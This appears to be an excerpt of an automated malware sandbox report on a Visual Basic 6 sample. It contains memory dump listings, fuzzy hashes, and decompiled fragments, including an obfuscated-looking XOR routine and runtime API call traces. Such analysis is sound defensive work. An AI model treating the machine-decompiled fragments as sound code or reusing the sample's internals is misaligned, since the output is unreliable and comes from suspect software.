                                                        0x0040945e
                                                        0x0040945f
                                                        0x00409460
                                                        0x00409466
                                                        0x00409467
                                                        0x00409469
                                                        0x0040946b
                                                        0x0040946d
                                                        0x0040946f
                                                        0x00409471
                                                        0x00409473
                                                        0x00409475
                                                        0x00409478
                                                        0x0040947d
                                                        0x0040947d
                                                        0x00409480
                                                        0x00409485
                                                        0x00409488
                                                        0x0040948e
                                                        0x0040948f
                                                        0x00409490
                                                        0x00409496
                                                        0x00409497
                                                        0x00409498
                                                        0x0040949e
                                                        0x0040949f
                                                        0x004094a0
                                                        0x004094a6
                                                        0x004094a7
                                                        0x004094a8
                                                        0x004094ae
                                                        0x004094af
                                                        0x004094b0
                                                        0x004094b6
                                                        0x004094b7
                                                        0x004094b8
                                                        0x004094be
                                                        0x004094bf
                                                        0x004094c0
                                                        0x004094c6
                                                        0x004094c7
                                                        0x004094c8
                                                        0x004094ce
                                                        0x004094cf
                                                        0x004094d0
                                                        0x0040950a
                                                        0x0040950b
                                                        0x0040950f
                                                        0x00409513
                                                        0x00409515
                                                        0x0040951e
                                                        0x00409523
                                                        0x00409526
                                                        0x00409527
                                                        0x0040952b
                                                        0x0040952c
                                                        0x0040952e
                                                        0x0040952f
                                                        0x00409533
                                                        0x00409537
                                                        0x0040953b
                                                        0x00409543
                                                        0x00409545
                                                        0x00409546
                                                        0x00409547
                                                        0x0040954a
                                                        0x0040954e
                                                        0x0040954f
                                                        0x00409553
                                                        0x00409556
                                                        0x00409557
                                                        0x00409559
                                                        0x0040955a
                                                        0x0040955a
                                                        0x0040955b
                                                        0x0040955d
                                                        0x0040955f
                                                        0x00409561
                                                        0x00409564
                                                        0x0040956a
                                                        0x0040956b
                                                        0x0040956c
                                                        0x0040956e
                                                        0x00409570
                                                        0x00409572
                                                        0x00409574
                                                        0x00409576
                                                        0x00409578
                                                        0x00409578
                                                        0x0040957a
                                                        0x0040957b
                                                        0x0040957d
                                                        0x0040957e
                                                        0x00000000
                                                        0x0040957e
                                                        0x0040941d
                                                        0x00409420
                                                        0x00409426
                                                        0x00409427
                                                        0x00409429
                                                        0x0040942c
                                                        0x00409432
                                                        0x00409433
                                                        0x00409435
                                                        0x00409438
                                                        0x0040943e
                                                        0x0040943f
                                                        0x0040943f
                                                        0x0040943f
                                                        0x00409441
                                                        0x00409444
                                                        0x00409444
                                                        0x0040944a
                                                        0x0040944b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7b7faa4242ddfb469e10d24f59bc417fd62dce5f77ec19fce019f4b7884fe771
                                                        • Instruction ID: dc36856f75deaff5d1664bd4aaa7f17e3064bd2aa8a58e43876811db7a75c472
                                                        • Opcode Fuzzy Hash: 7b7faa4242ddfb469e10d24f59bc417fd62dce5f77ec19fce019f4b7884fe771
                                                        • Instruction Fuzzy Hash: 5741715355EAD2EEE31B8BB89C19453FF986D479203090EDED0E09F093E196492DC367
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5ff51a9e06bdb94a099717903e7cf8c20d7800a316cdafb28058dd3f8e4162e5
                                                        • Instruction ID: c9b8e15257a981657f70bb293d509f30b5fa247d60b9d2eb96ec0f9db1b19867
                                                        • Opcode Fuzzy Hash: 5ff51a9e06bdb94a099717903e7cf8c20d7800a316cdafb28058dd3f8e4162e5
                                                        • Instruction Fuzzy Hash: 34218B5A426EC1EEA30A47B5D80A467FFA9EE4EA503540ECDE2D11F263F2670138D316
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 46%
                                                        			E0040314D(intOrPtr* __eax, signed int __ecx, signed int __esi) {
                                                        				intOrPtr* _t88;
                                                        				signed int _t91;
                                                        
                                                        				ss =  *((intOrPtr*)(__ecx - 1));
                                                        				 *(__esi - 0x71cf01af) =  *(__esi - 0x71cf01af) ^ __ecx;
                                                        				_push(__ecx);
                                                        				_push( *__eax);
                                                        				ss =  *((intOrPtr*)(__ecx - 1));
                                                        				 *(__esi - 0x71cf00af) =  *(__esi - 0x71cf00af) ^ __ecx;
                                                        				_push(__ecx);
                                                        				_push( *__eax);
                                                        				ss =  *((intOrPtr*)(__ecx - 2));
                                                        				 *(__esi - 0x71cf00af) =  *(__esi - 0x71cf00af) ^ __ecx;
                                                        				_push(__ecx);
                                                        				asm("sti");
                                                        				 *(__esi - 0x71cf03af) =  *(__esi - 0x71cf03af) ^ __ecx;
                                                        				_push(__ecx);
                                                        				_push( *__eax);
                                                        				ss =  *((intOrPtr*)(__ecx - 0xe));
                                                        				 *(__esi - 0x71cf0faf) =  *(__esi - 0x71cf0faf) ^ __ecx;
                                                        				_push(__ecx);
                                                        				asm("cli");
                                                        				 *(__esi - 0x71cf00af) =  *(__esi - 0x71cf00af) ^ __ecx;
                                                        				_push(__ecx);
                                                        				asm("hlt");
                                                        				 *(__esi - 0x71cf0aaf) =  *(__esi - 0x71cf0aaf) ^ __ecx;
                                                        				_push(__ecx);
                                                        				asm("out dx, al");
                                                        				 *(__esi + 0x2851) =  *(__esi + 0x2851) ^ __ecx;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *(__esi - 0x71cfd8af) =  *(__esi - 0x71cfd8af) ^ __ecx;
                                                        				_push(__ecx);
                                                        				 *(__eax - 0x71cf3eaf) =  *(__eax - 0x71cf3eaf) ^ __ecx;
                                                        				_push(__ecx);
                                                        				 *__esi =  *__esi << 0x8e;
                                                        				_push(__ecx);
                                                        				asm("out dx, al");
                                                        				 *(__eax - 0x71cf0baf) =  *(__eax - 0x71cf0baf) ^ __ecx;
                                                        				_push(__ecx);
                                                        				asm("out dx, al");
                                                        				 *(__eax - 0x71cf09af) =  *(__eax - 0x71cf09af) ^ __ecx;
                                                        				_push(__ecx);
                                                        				goto 0xf591c000;
                                                        				 *(__eax - 0x71cf1baf) =  *(__eax - 0x71cf1baf) ^ __ecx;
                                                        				ss =  *((intOrPtr*)(__ecx - 0x1c));
                                                        				 *(__eax - 0x71cf10af) =  *(__eax - 0x71cf10af) ^ __ecx;
                                                        				_push(__ecx);
                                                        				asm("clc");
                                                        				 *(__eax - 0x71cf11af) =  *(__eax - 0x71cf11af) ^ __ecx;
                                                        				_push(__ecx);
                                                        				_t91 = __esi %  *__esi;
                                                        				ss =  *((intOrPtr*)(__ecx - 2));
                                                        				 *(__eax - 0x71cf0aaf) =  *(__eax - 0x71cf0aaf) ^ __ecx;
                                                        				_push(__ecx);
                                                        				asm("lock xor [esi-0x71cf0daf], cl");
                                                        				_push(__ecx);
                                                        				asm("jecxz 0x32");
                                                        				ss =  *((intOrPtr*)(__ecx - 0x26));
                                                        				 *(__eax - 0x71cf23af) =  *(__eax - 0x71cf23af) ^ __ecx;
                                                        				_push(__ecx);
                                                        				asm("fidiv dword [eax]");
                                                        				ss =  *((intOrPtr*)(__ecx - 0x12));
                                                        				 *(__eax - 0x71cf03af) =  *(__eax - 0x71cf03af) ^ __ecx;
                                                        				_push(__ecx);
                                                        				asm("hlt");
                                                        				 *(__eax - 0x71cf1daf) =  *(__eax - 0x71cf1daf) ^ __ecx;
                                                        				_push(__ecx);
                                                        				_push(__ecx);
                                                        				asm("fnstenv [eax]");
                                                        				ss =  *((intOrPtr*)(__ecx - 0x15));
                                                        				 *(__eax - 0x71cf02af) =  *(__eax - 0x71cf02af) ^ __ecx;
                                                        				_push(__ecx);
                                                        				asm("lock xor [esi-0x71cf15af], cl");
                                                        				_push(__ecx);
                                                        				asm("iretd");
                                                        				 *(__eax - 0x71cf25af) =  *(__eax - 0x71cf25af) ^ __ecx;
                                                        				_push(__ecx);
                                                        				asm("fidiv dword [eax]");
                                                        				ss =  *((intOrPtr*)(__ecx - 0x13));
                                                        				 *(__eax - 0x71cf13af) =  *(__eax - 0x71cf13af) ^ __ecx;
                                                        				_push(__ecx);
                                                        				asm("in al, dx");
                                                        				 *(__eax - 0x71cf10af) =  *(__eax - 0x71cf10af) ^ __ecx;
                                                        				_push(__ecx);
                                                        				asm("clc");
                                                        				 *(__eax - 0x71cf0eaf) =  *(__eax - 0x71cf0eaf) ^ __ecx;
                                                        				_push(__ecx);
                                                        				asm("in eax, 0x30");
                                                        				ss =  *((intOrPtr*)(__ecx - 0x1d));
                                                        				 *(__eax - 0x71cf0daf) =  *(__eax - 0x71cf0daf) ^ __ecx;
                                                        				_push(__ecx);
                                                        				asm("int1");
                                                        				 *(__eax - 0x71cf08af) =  *(__eax - 0x71cf08af) ^ __ecx;
                                                        				_push(__ecx);
                                                        				asm("stc");
                                                        				 *(__eax - 0x71cf16af) =  *(__eax - 0x71cf16af) ^ __ecx;
                                                        				_push(__ecx);
                                                        				asm("repe xor [esi-0x71cf16af], cl");
                                                        				ss =  *((intOrPtr*)(__ecx - 0x17));
                                                        				 *(__eax - 0x71cf12af) =  *(__eax - 0x71cf12af) ^ __ecx;
                                                        				_push(__ecx);
                                                        				asm("cmc");
                                                        				 *(__eax - 0x71cf33af) =  *(__eax - 0x71cf33af) ^ __ecx;
                                                        				_push(__ecx);
                                                        				ss =  *0xFFFFFFFFFFFFFFFF;
                                                        				 *(__eax - 0x71cf1daf) =  *(__eax - 0x71cf1daf) ^ 0x00000030;
                                                        				 *(__eax + 0x5851) =  *(__eax + 0x5851) ^ 0x00000030;
                                                        				_t88 = 0x30;
                                                        				 *_t88 =  *_t88 + _t88;
                                                        				 *_t88 =  *_t88 + _t88;
                                                        				 *_t88 =  *_t88 + _t88;
                                                        				 *_t88 =  *_t88 + _t88;
                                                        				 *_t88 =  *_t88 + _t88;
                                                        				 *_t88 =  *_t88 + _t88;
                                                        				 *_t88 =  *_t88 + _t88;
                                                        				 *_t88 =  *_t88 + _t88;
                                                        				 *_t88 =  *_t88 + _t88;
                                                        				 *_t88 =  *_t88 + _t88;
                                                        				 *_t88 =  *_t88 + _t88;
                                                        				 *_t88 =  *_t88 + _t88;
                                                        				 *_t88 =  *_t88 + _t88;
                                                        				 *_t88 =  *_t88 + _t88;
                                                        				 *_t88 =  *_t88 + _t88;
                                                        				 *_t88 =  *_t88 + _t88;
                                                        				 *0x30 =  *0x30 + _t91;
                                                        				ss =  *((intOrPtr*)(_t91 + 6));
                                                        				 *(__eax - 0x6eca46af) =  *(__eax - 0x6eca46af) ^ 0x00000030;
                                                        				return _t88;
                                                        			}





                                                        0x0040314d
                                                        0x00403150
                                                        0x00403156
                                                        0x00403157
                                                        0x00403159
                                                        0x0040315c
                                                        0x00403162
                                                        0x00403163
                                                        0x00403165
                                                        0x00403168
                                                        0x0040316e
                                                        0x0040316f
                                                        0x00403170
                                                        0x00403176
                                                        0x00403177
                                                        0x00403179
                                                        0x0040317c
                                                        0x00403182
                                                        0x00403183
                                                        0x00403184
                                                        0x0040318a
                                                        0x0040318b
                                                        0x0040318c
                                                        0x00403192
                                                        0x00403193
                                                        0x00403194
                                                        0x0040319a
                                                        0x0040319c
                                                        0x0040319e
                                                        0x004031a0
                                                        0x004031a2
                                                        0x004031a4
                                                        0x004031a6
                                                        0x004031a8
                                                        0x004031ae
                                                        0x004031b0
                                                        0x004031b6
                                                        0x004031b7
                                                        0x004031ba
                                                        0x004031bb
                                                        0x004031bc
                                                        0x004031c2
                                                        0x004031c3
                                                        0x004031c4
                                                        0x004031ca
                                                        0x004031cb
                                                        0x004031d0
                                                        0x004031d1
                                                        0x004031d4
                                                        0x004031da
                                                        0x004031db
                                                        0x004031dc
                                                        0x004031e2
                                                        0x004031e3
                                                        0x004031e5
                                                        0x004031e8
                                                        0x004031ee
                                                        0x004031ef
                                                        0x004031f6
                                                        0x004031f7
                                                        0x004031f9
                                                        0x004031fc
                                                        0x00403202
                                                        0x00403203
                                                        0x00403205
                                                        0x00403208
                                                        0x0040320e
                                                        0x0040320f
                                                        0x00403210
                                                        0x00403216
                                                        0x0040321e
                                                        0x0040321f
                                                        0x00403221
                                                        0x00403224
                                                        0x0040322a
                                                        0x0040322b
                                                        0x00403232
                                                        0x00403233
                                                        0x00403234
                                                        0x00403236
                                                        0x00403237
                                                        0x00403239
                                                        0x0040323c
                                                        0x00403242
                                                        0x00403243
                                                        0x00403244
                                                        0x0040324a
                                                        0x0040324b
                                                        0x0040324c
                                                        0x00403252
                                                        0x00403253
                                                        0x00403255
                                                        0x00403258
                                                        0x0040325e
                                                        0x0040325f
                                                        0x00403260
                                                        0x00403266
                                                        0x00403267
                                                        0x00403268
                                                        0x0040326e
                                                        0x0040326f
                                                        0x00403271
                                                        0x00403274
                                                        0x0040327a
                                                        0x0040327b
                                                        0x0040327c
                                                        0x00403282
                                                        0x00403285
                                                        0x00403288
                                                        0x00403290
                                                        0x00403293
                                                        0x00403294
                                                        0x00403296
                                                        0x00403298
                                                        0x0040329a
                                                        0x0040329c
                                                        0x0040329e
                                                        0x004032a0
                                                        0x004032a2
                                                        0x004032a4
                                                        0x004032a6
                                                        0x004032a8
                                                        0x004032aa
                                                        0x004032ab
                                                        0x004032ad
                                                        0x004032af
                                                        0x004032b1
                                                        0x004032b3
                                                        0x004032b5
                                                        0x004032b8
                                                        0x004032bf

                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b23c9238bf0d27cf2fb93fde19b2eb137b6097d95fe459933858b00c57a33c6c
                                                        • Instruction ID: bda015628b82448aa2b50c3ac2d00462a791f464b5dab21b6db34c0d45f36fba
                                                        • Opcode Fuzzy Hash: b23c9238bf0d27cf2fb93fde19b2eb137b6097d95fe459933858b00c57a33c6c
                                                        • Instruction Fuzzy Hash: 9D01004656AAD2EEF71E47B4980A853FE9A6E469643490FCDE1E51E093A183053CC217
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E003F4DF0() {
                                                        
                                                        				return  *[fs:0x30];
                                                        			}



                                                        0x003f4df6

                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256698017.00000000003F1000.00000020.00000001.sdmp, Offset: 003F0000, based on PE: true
                                                        • Associated: 00000007.00000002.2256695140.00000000003F0000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000007.00000002.2256705457.00000000003FD000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000007.00000002.2256709121.00000000003FF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_3f0000_tmp_e473b4.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                        • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                        • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                        • Instruction Fuzzy Hash:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041FF39
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401968,004113E8,00000024,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041FF58
                                                          • Part of subcall function 004241F0: __vbaStrCopy.MSVBVM60(00000001,00000000,72A26C30), ref: 0042423F
                                                          • Part of subcall function 004241F0: __vbaStrCopy.MSVBVM60 ref: 00424247
                                                          • Part of subcall function 004241F0: __vbaStrCat.MSVBVM60(00411B14,?,?,00000001), ref: 00424258
                                                          • Part of subcall function 004241F0: __vbaStrMove.MSVBVM60 ref: 00424269
                                                          • Part of subcall function 004241F0: __vbaInStr.MSVBVM60(00000000,00000000), ref: 0042426D
                                                          • Part of subcall function 004241F0: __vbaFreeStr.MSVBVM60 ref: 0042427B
                                                          • Part of subcall function 004241F0: __vbaLenBstr.MSVBVM60(?), ref: 0042428D
                                                          • Part of subcall function 004241F0: #631.MSVBVM60(?,-00000002,?,00000001), ref: 004242C2
                                                          • Part of subcall function 004241F0: __vbaStrMove.MSVBVM60 ref: 004242CD
                                                          • Part of subcall function 004241F0: #537.MSVBVM60(00000022,00000000), ref: 004242D2
                                                          • Part of subcall function 004241F0: __vbaStrMove.MSVBVM60 ref: 004242DD
                                                          • Part of subcall function 004241F0: __vbaInStr.MSVBVM60(00000000,00000000), ref: 004242E1
                                                          • Part of subcall function 004241F0: __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 004242FD
                                                          • Part of subcall function 004241F0: __vbaFreeVar.MSVBVM60 ref: 00424309
                                                        • __vbaStrCmp.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041FF6C
                                                        • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041FF7B
                                                        • __vbaStrMove.MSVBVM60(?,0040F3C8,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041FFA3
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041FFAA
                                                        • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041FFB3
                                                        • __vbaStrMove.MSVBVM60(?,shape,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041FFCC
                                                        • __vbaStrCmp.MSVBVM60(rect,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041FFD7
                                                        • __vbaStrCmp.MSVBVM60(rectangle,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041FFE6
                                                        • __vbaStrCmp.MSVBVM60(circ,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041FFF5
                                                        • __vbaStrCmp.MSVBVM60(circle,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00420004
                                                        • __vbaStrCmp.MSVBVM60(poly,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00420013
                                                        • __vbaStrCmp.MSVBVM60(polygon,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00420022
                                                        • __vbaStrMove.MSVBVM60(?,coords), ref: 00420054
                                                        • __vbaStrCopy.MSVBVM60 ref: 0042005B
                                                        • __vbaFreeStr.MSVBVM60 ref: 00420064
                                                        • __vbaStrMove.MSVBVM60(?,href), ref: 0042007D
                                                        • __vbaStrCopy.MSVBVM60 ref: 00420084
                                                        • __vbaFreeStr.MSVBVM60 ref: 0042008D
                                                        • __vbaStrMove.MSVBVM60(?,target), ref: 004200A6
                                                        • __vbaStrCmp.MSVBVM60(_blank,?), ref: 004200B1
                                                        • __vbaStrCmp.MSVBVM60(_parent,?), ref: 004200C9
                                                        • __vbaFreeStrList.MSVBVM60(00000002,?,?,00420155,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00420142
                                                        • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0042014E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$Free$Move$Copy$List$#537#631BstrCheckHresult
                                                        • String ID: _blank$_parent$_search$_self$_top$circ$circle$coords$href$poly$polygon$rect$rectangle$shape$target
                                                        • API String ID: 1777429465-1944865882
                                                        • Opcode ID: 2ac7a639ecb2ed9e2a13de743f39c1725df32ba920b5c6ceb667fcbbac794aeb
                                                        • Instruction ID: 08c712d641e70ee6887c4f8d6a5fe3895b375d10a0179195d0f8762a5f230e95
                                                        • Opcode Fuzzy Hash: 2ac7a639ecb2ed9e2a13de743f39c1725df32ba920b5c6ceb667fcbbac794aeb
                                                        • Instruction Fuzzy Hash: 22619370B003169FDB10DBA5ED85AFFB7F8EF54704F50402AE512A32A1DA79D846CB68
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00424100: __vbaStrCopy.MSVBVM60(?,00000000,?), ref: 0042413E
                                                          • Part of subcall function 00424100: #608.MSVBVM60(?), ref: 00424170
                                                          • Part of subcall function 00424100: __vbaVarCat.MSVBVM60(?,?,00000008), ref: 00424182
                                                          • Part of subcall function 00424100: __vbaStrVarMove.MSVBVM60(00000000), ref: 00424189
                                                          • Part of subcall function 00424100: __vbaStrMove.MSVBVM60 ref: 00424196
                                                          • Part of subcall function 00424100: __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 004241A2
                                                        • __vbaUbound.MSVBVM60(00000001,00000000,?,00401610,?), ref: 0041BCAE
                                                        • __vbaGenerateBoundsError.MSVBVM60 ref: 0041BCF9
                                                        • __vbaGenerateBoundsError.MSVBVM60 ref: 0041BD05
                                                        • #632.MSVBVM60(?,00004008,00000000,00000002), ref: 0041BD46
                                                        • __vbaStrVarVal.MSVBVM60(?,?), ref: 0041BD54
                                                        • #516.MSVBVM60(00000000), ref: 0041BD5B
                                                        • __vbaUI1I2.MSVBVM60 ref: 0041BD63
                                                        • __vbaFreeStr.MSVBVM60 ref: 0041BD6F
                                                        • __vbaFreeVarList.MSVBVM60(00000002,00000002,?), ref: 0041BD7F
                                                        • __vbaGenerateBoundsError.MSVBVM60 ref: 0041BD9F
                                                        • __vbaGenerateBoundsError.MSVBVM60 ref: 0041BDAB
                                                        • #608.MSVBVM60(00000002,?), ref: 0041BDE0
                                                        • __vbaInStrVar.MSVBVM60(?,00000000,00000002,00000008,00000001), ref: 0041BDF8
                                                        • __vbaI2Var.MSVBVM60(00000000), ref: 0041BDFF
                                                        • __vbaFreeVarList.MSVBVM60(00000002,00000002,?), ref: 0041BE11
                                                        • #632.MSVBVM60(?,00000008,?,00000002), ref: 0041BE62
                                                        • __vbaStrVarMove.MSVBVM60(?,?,00000002), ref: 0041BE6C
                                                        • __vbaStrMove.MSVBVM60(?,00000002), ref: 0041BE77
                                                        • __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,00000002), ref: 0041BE87
                                                        • #617.MSVBVM60(00000002,00004008,00000000), ref: 0041BEBC
                                                        • #608.MSVBVM60(?,?), ref: 0041BEC7
                                                        • #632.MSVBVM60(?,?,00000000,?), ref: 0041BF22
                                                        • __vbaVarCat.MSVBVM60(?,?,00000002), ref: 0041BF3A
                                                        • __vbaVarCat.MSVBVM60(?,00000008,00000000), ref: 0041BF48
                                                        • __vbaVarCat.MSVBVM60(?,?,00000000), ref: 0041BF59
                                                        • __vbaStrVarMove.MSVBVM60(00000000), ref: 0041BF5C
                                                        • __vbaStrMove.MSVBVM60 ref: 0041BF69
                                                        • __vbaFreeVarList.MSVBVM60(00000007,00000002,?,?,0000000A,?,?,?), ref: 0041BF93
                                                        • __vbaFreeStr.MSVBVM60(0041BFFB), ref: 0041BFF4
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$Free$Move$List$BoundsErrorGenerate$#608#632$#516#617CopyUbound
                                                        • String ID:
                                                        • API String ID: 322533643-0
                                                        • Opcode ID: 41ea95b28fc35ec7ac6a97c5160f8b06b217469a4882b2e9fd4b9f8ca8a86784
                                                        • Instruction ID: f390c56d0e39148dad3ded0c7c6740b6b8a7593ccd57457591c175fa0d4be669
                                                        • Opcode Fuzzy Hash: 41ea95b28fc35ec7ac6a97c5160f8b06b217469a4882b2e9fd4b9f8ca8a86784
                                                        • Instruction Fuzzy Hash: 22024DB1D00219EFDB14DFA4DD88AEEBBB8FB48700F00816AE515B7250DB745985CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421DC6
                                                        • __vbaStrCmp.MSVBVM60(0040F38C,00422324,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421DD5
                                                        • __vbaStrCat.MSVBVM60( id=,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421DEE
                                                        • __vbaStrMove.MSVBVM60(00422324,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421E0C
                                                        • __vbaStrCat.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421E0F
                                                        • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421E16
                                                        • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421E22
                                                        • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421DFB
                                                          • Part of subcall function 00424480: __vbaStrCopy.MSVBVM60(?,00000000,72A1A274), ref: 004244C0
                                                          • Part of subcall function 00424480: #537.MSVBVM60(00000022), ref: 004244CE
                                                          • Part of subcall function 00424480: __vbaStrMove.MSVBVM60 ref: 004244DB
                                                          • Part of subcall function 00424480: __vbaStrCat.MSVBVM60(?,00000000), ref: 004244E8
                                                          • Part of subcall function 00424480: __vbaStrMove.MSVBVM60 ref: 004244EF
                                                          • Part of subcall function 00424480: #537.MSVBVM60(00000022,00000000), ref: 004244F4
                                                          • Part of subcall function 00424480: __vbaStrMove.MSVBVM60 ref: 004244FB
                                                          • Part of subcall function 00424480: __vbaStrCat.MSVBVM60(00000000), ref: 004244FE
                                                          • Part of subcall function 00424480: __vbaStrMove.MSVBVM60 ref: 00424505
                                                          • Part of subcall function 00424480: __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00424515
                                                          • Part of subcall function 00424480: __vbaFreeStr.MSVBVM60(00424556), ref: 0042454F
                                                        • __vbaStrCmp.MSVBVM60(0040F38C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421E42
                                                        • __vbaStrCat.MSVBVM60( name=,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421E55
                                                        • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421E5C
